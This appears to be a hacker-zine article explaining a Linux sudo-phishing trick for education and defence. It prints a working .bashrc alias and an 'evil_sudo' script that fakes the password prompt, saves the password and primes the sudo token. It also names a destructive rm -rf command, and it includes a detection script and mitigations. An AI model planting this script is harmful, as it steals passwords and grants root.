Gone Phishin'

by Columbo

So you've installed Linux.  You were tired of Windows and how insecure it was.  You can just forget about security issues now that you have an open-source or maybe even straight up Richard Stallman approved Libre alternative.  Right?  Think again.

If you're familiar with the world of "UNIX-like" operating systems, then you probably know about the sudo command.  Sudo, which stands for "superuser do" or "substitute user do," lets you run commands with the privileges of another user.  Most commonly, it is used to elevate privileges to the administrator so you can perform maintenance on the system or install new software.

Sudo is installed by default on many Linux distros, including but not limited to Ubuntu.  In the sudoers file (a configuration file usually found at /etc/sudoers), you'll find the following line is often included by default:

%sudo ALL=(ALL:ALL) ALL

This will give any user in the "sudo" group the right to do almost anything on the machine as long as they supply their password.  While this is arguably a lot safer than running as root, there is still plenty of room for abuse.  Just for fun, let's take a look at one of the reasons this could be a less than ideal way to run your system.

Depending on which shell you're running, a resource configuration file may determine certain settings.  This file is often found in a user's home directory and usually doesn't require any special privileges to edit as long as you're the user.  If you're using Bash, this is probably located in your home folder and named ".bashrc" (the period before the name makes it hidden).

Inside the .bashrc file we can add aliases, which can be used as shortcuts for certain commands.  These aliases can be very convenient if you want to simplify commands.  For example, instead of typing out a long string to update the system, you could have the command "update" run the much longer command.

I'm going to show you how this could be used for more nefarious purposes.  How about we slip in an alias for an already existing command like sudo?

(Note: in these first few examples, the dollar sign indicates that a non-root user on the machine is executing the command in the terminal.  This is not to be confused with the Bash script below where the dollar signs indicate a variable.  That's not to say these first few commands couldn't be part of another script that secretly adds this alias and plants an "evil_sudo" file on your machine.)

$ echo "alias sudo='~/evil_sudo'" >> .bashrc

If the user is running Bash, then this first command will make the sudo command execute a file in the home directory named "evil_sudo" instead of sudo.  Now, why not make an evil_sudo file?
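From the defender's side, the first thing to check is whether your shell already resolves "sudo" to something other than the real binary. The following script is an added example and not part of the original article; the helper names find_sudo_shadows and what_is_sudo are made up for it, and the sample .bashrc content is constructed.

```shell
#!/bin/bash
# Added example (not from the article): look for anything in shell startup
# files that shadows the real sudo binary, which is the foothold the alias
# trick above relies on.  Function names are assumptions for this example.

# Print every line in the given files that defines an alias or a function
# named "sudo".  Returns 0 if at least one hit was found, 1 otherwise.
find_sudo_shadows() {
    hits=0
    for f in "$@"; do
        [ -r "$f" ] || continue
        # Matches:  alias sudo=...  |  sudo() { ... }  |  function sudo ...
        if grep -nE '^[[:space:]]*(alias[[:space:]]+sudo=|sudo[[:space:]]*\(\)|function[[:space:]]+sudo([[:space:]]|\(|\{|$))' "$f"; then
            hits=1
        fi
    done
    [ "$hits" -eq 1 ]
}

# Ask the running shell what "sudo" actually resolves to.  Anything other
# than a path such as /usr/bin/sudo (an alias, a function, a file in your
# home directory) deserves a closer look.
what_is_sudo() {
    command -V sudo 2>/dev/null
}

# Constructed demo: a temporary .bashrc carrying the planted alias, scanned
# together with the usual startup files of the current user.
demo() {
    tmp=$(mktemp)
    printf '%s\n' 'export EDITOR=vim' "alias sudo='~/evil_sudo'" 'alias ll="ls -l"' > "$tmp"
    find_sudo_shadows "$tmp" "$HOME/.bashrc" "$HOME/.bash_aliases" "$HOME/.profile"
    rc=$?
    rm -f "$tmp"
    what_is_sudo
    return $rc
}
```

Run it with `demo`; a non-zero exit from find_sudo_shadows means no shadowing was found in the files it could read, and the `what_is_sudo` line should name the real binary's path.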

$ touch evil_sudo

Let's make sure that file has the correct permissions to be executed:

$ chmod +x evil_sudo

Now open up your evil_sudo file and put the following inside:

#!/bin/bash
# creates a variable containing the username of the user executing the script.
name=$(whoami)

# imitates a sudo password prompt including the username.
echo -n "[sudo] password for $name:"

# reads from standard input. the -s keeps the letters from showing. 
# password is the variable now containing the password the user types
read -s password

# command is now the variable with all the arguments after the sudo command.
command=$@

# takes the password and writes it to a file called supersecretplace in the 
# home folder.
echo $password > ~/supersecretplace

# runs a fake command in the background using the user's password to grant 
# access to the sudo token.
echo "$password" | sudo -S settoken &

# runs the user's command with the focus of the standard input in the user's 
# control.
sudo $command

This is a simple script to imitate a sudo password prompt and phish the password from the user.  The script steals the password and puts it into a file.  The script then uses the password to issue a nonsense sudo command.

At the time of writing, on a lot of popular distributions of Linux, this will activate a token that lets us use sudo without a password for something like 15 minutes depending on the configuration.  Then finally, the actual command the user input is run so everything looks normal.  The reason I didn't just run the user's command from the start is that when you give sudo the password with the "-S" switch you may not be able to respond to Y/N prompts or input any data after it's run.  The "-S" switch is required because we're feeding sudo the password through a pipe on standard input rather than typing it at the terminal.

There's obviously nothing stopping you from adding further commands to be run with root privileges.  For example, it would be trivial from here on out to steal private encryption keys, or bitcoin wallets from all the users on the system.  You can send those suckers straight to your FTP server.  With the sudo password, you have root.  You own the system.

There are a number of things you can do to mitigate against an attack like this.

1.)  Configure sudo to prompt you for a password every time it's used (rather than activating a temporary token for 15 minutes or so).

Change the line in your "/etc/sudoers" file that reads:

Defaults env_reset

to the following:

Defaults env_reset, timestamp_timeout=0

If these settings are already in place, you could alter the bash script to run the actual command in place of the fake command.  It would still save the password in a file, and you could use that to your advantage, but it would be obvious something was wrong if the user input a command which required an additional response (such as "sudo apt upgrade").

2.)  Only run scripts from sources you trust.  Did someone give you a cool terminal color testing script in IRC?  Make sure you at least read the code before you run it.

3.)  Have you been given a list of commands to fix a problem with your computer?  Make sure you know what you're typing in.  The command "sudo rm -rf --no-preserve-root /" will not make your sound suddenly start working.  It will just delete a lot of stuff.

4.)  You could configure sudo to run a few commands without a password, and move over to another TTY to do anything requiring administrative privileges from the actual root account.  Here's an example.  You can put these things in your /etc/sudoers file under "User privilege specification:"

username ALL=NOPASSWD: /usr/bin/apt update
username ALL=NOPASSWD: /usr/bin/apt upgrade
username ALL=NOPASSWD: /bin/mount
username ALL=NOPASSWD: /bin/umount
username ALL=NOPASSWD: /sbin/fdisk -l
username ALL=NOPASSWD: /sbin/reboot

This will (assuming you have these files on your system) allow the user named on those lines to update the system with apt; mount and unmount disks; view the available disk information; and reboot the machine without the need for a password.  Perhaps that's not the ideal setup, but at least your password won't get phished when you run those commands.

5.)  Do not copy and paste code from a website directly into the terminal.  Malicious code can be hidden within the text copied.

6.)  Be careful when using curl to pipe code directly into the terminal.  Use a checksum to verify the integrity of the file, make sure you're connected to a trusted site using TLS, or both.

I suppose that pretty much sums it up.  Just be careful out there and don't be a jerk or it might come back to haunt you.
